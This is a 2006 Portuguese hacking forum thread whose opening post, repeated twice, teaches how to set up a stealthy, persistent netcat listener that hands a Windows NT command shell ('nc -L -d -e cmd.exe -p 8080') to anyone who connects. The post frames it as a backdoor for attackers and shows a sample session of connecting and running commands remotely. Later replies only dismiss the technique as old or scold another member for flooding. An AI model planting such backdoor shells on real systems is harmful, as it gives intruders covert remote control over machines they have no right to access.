Title: Shells remotos via ouvidores Netcat
Post by: _Dr4k0_ on 27 de July , 2006, 06:17:08 PM
Post by: _Dr4k0_ on 27 de July , 2006, 06:17:08 PM
Aew galera udigrudi, neste post irei demostrar uma tecnica muito usada pela 31337 ! creio que poucos sabem. espero que seja util. Let's Hack
Outra porta dos fundos facil de estabelecer usa o "canivete suiço do TCP/IP", o netcat. O netcat pode ser configurado de modo a ouvir em uma certa porta e lançar um executavel quando um sistema remoto se conecta àquela porta. Configurando-se um ouvidor netcat de modo a disparar o lançamento de um shell de comando NT, esse shell pode ser empurrado de volta para um sistema remoto. A sintaxe para lançar o netcat em modo de escuta furtivo é mostrada a seguir. -L torna o ouvidor persistente ao longo de multiplas conexoes encerradas, -d executa o netcat em modo furtivo( sem console interativo ) e -e especifica o programa a lançar, neste caso o cmd.exe, o interpretador de comandos do NT. -p especifica a porta a ouvir.
Código:
C:\TEMP\NC11NT>nc -L -d -e cmd.exe -p 8080
Isto retornará um shell de comando remoto a qualquer atacante que se conecte à porta 8080. Na sequencia a seguir, uso o netcat em um sistema remoto para conectar a porta ouvindo à maquina mostrada anterior( endereço ip: 192.168.202.44 ) e receber um shell de comando remoto. Para reduzir a confusao, configurei o prompt de comando do sistema local para "D:\>", sendo que o remoto é "C:\TEMP\NC11NT>".
D:\> nc 192.168.202.44 8080
Microsoft ® Windows NT ™
© Copyright 1985-1996 Microsoft Corp.
C:\TEMP\NC11NT>
C:\TEMP\NC11NT>ipconfig
Windows NT IP Configuration
Ethernet adapter FEM5561
IP Address . . . . . . . . . . . .: 192.168.202.44
Subnet Mask . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . .:
C:\TEMP\NC11NT>exit
D:\>
Como voces podem ver, usuarios remotos agora conseguem executar comandos e lançar arquivos. Eles so sao limitados por sua criatividade com o console do NT.
Abraços !
Créditos :AciDmuD
Outra porta dos fundos facil de estabelecer usa o "canivete suiço do TCP/IP", o netcat. O netcat pode ser configurado de modo a ouvir em uma certa porta e lançar um executavel quando um sistema remoto se conecta àquela porta. Configurando-se um ouvidor netcat de modo a disparar o lançamento de um shell de comando NT, esse shell pode ser empurrado de volta para um sistema remoto. A sintaxe para lançar o netcat em modo de escuta furtivo é mostrada a seguir. -L torna o ouvidor persistente ao longo de multiplas conexoes encerradas, -d executa o netcat em modo furtivo( sem console interativo ) e -e especifica o programa a lançar, neste caso o cmd.exe, o interpretador de comandos do NT. -p especifica a porta a ouvir.
Código:
C:\TEMP\NC11NT>nc -L -d -e cmd.exe -p 8080
Isto retornará um shell de comando remoto a qualquer atacante que se conecte à porta 8080. Na sequencia a seguir, uso o netcat em um sistema remoto para conectar a porta ouvindo à maquina mostrada anterior( endereço ip: 192.168.202.44 ) e receber um shell de comando remoto. Para reduzir a confusao, configurei o prompt de comando do sistema local para "D:\>", sendo que o remoto é "C:\TEMP\NC11NT>".
D:\> nc 192.168.202.44 8080
Microsoft ® Windows NT ™
© Copyright 1985-1996 Microsoft Corp.
C:\TEMP\NC11NT>
C:\TEMP\NC11NT>ipconfig
Windows NT IP Configuration
Ethernet adapter FEM5561
IP Address . . . . . . . . . . . .: 192.168.202.44
Subnet Mask . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . .:
C:\TEMP\NC11NT>exit
D:\>
Como voces podem ver, usuarios remotos agora conseguem executar comandos e lançar arquivos. Eles so sao limitados por sua criatividade com o console do NT.
Abraços !
Créditos :AciDmuD
Title: Re: Shells remotos via ouvidores Netcat
Post by: HadeS on 28 de July , 2006, 12:44:26 AM
Post by: HadeS on 28 de July , 2006, 12:44:26 AM
Poucos sabem... :O
Desculpa, mas isso é velho e para uma pessoa pensar em ser "Hacker", tem que saber isso.
Desculpa _Dr4k0_, a critica não é a você, mas esses textos do AciDmuD não estão com nada.
HadeS
Desculpa, mas isso é velho e para uma pessoa pensar em ser "Hacker", tem que saber isso.
Desculpa _Dr4k0_, a critica não é a você, mas esses textos do AciDmuD não estão com nada.
HadeS
Title: Re: Shells remotos via ouvidores Netcat
Post by: _Dr4k0_ on 28 de July , 2006, 10:32:53 AM
Post by: _Dr4k0_ on 28 de July , 2006, 10:32:53 AM
Quote from: "HadeS"Poucos sabem... :O
Desculpa, mas isso é velho e para uma pessoa pensar em ser "Hacker", tem que saber isso.
Desculpa _Dr4k0_, a critica não é a você, mas esses textos do AciDmuD não estão com nada.
HadeS
Sim eu entendi eu só estou compartilhando alguns textos
Title: Re: Shells remotos via ouvidores Netcat
Post by: HadeS on 28 de July , 2006, 02:55:58 PM
Post by: HadeS on 28 de July , 2006, 02:55:58 PM
Sim, eu sei Drako, minha(s) crítica(s) não são a você, e sim a quem escreveu os textos. Eu sei que sua intenção é a melhor, só quer compartilhar.
HadeS
HadeS
Title: Re: Shells remotos via ouvidores Netcat
Post by: Anonymous on 29 de July , 2006, 06:38:49 PM
Post by: Anonymous on 29 de July , 2006, 06:38:49 PM
manjado
Title: Re: Shells remotos via ouvidores Netcat
Post by: Ðark$pawn on 29 de July , 2006, 06:45:17 PM
Post by: Ðark$pawn on 29 de July , 2006, 06:45:17 PM
Quote from: "f4kelive"manjado
Acabei de avisar um agora, da próxima, cabeças vão rolar (hehe)!!!
Não quero ser chato, apenas quero o fórum da melhor forma possível e flood é inadmissível!
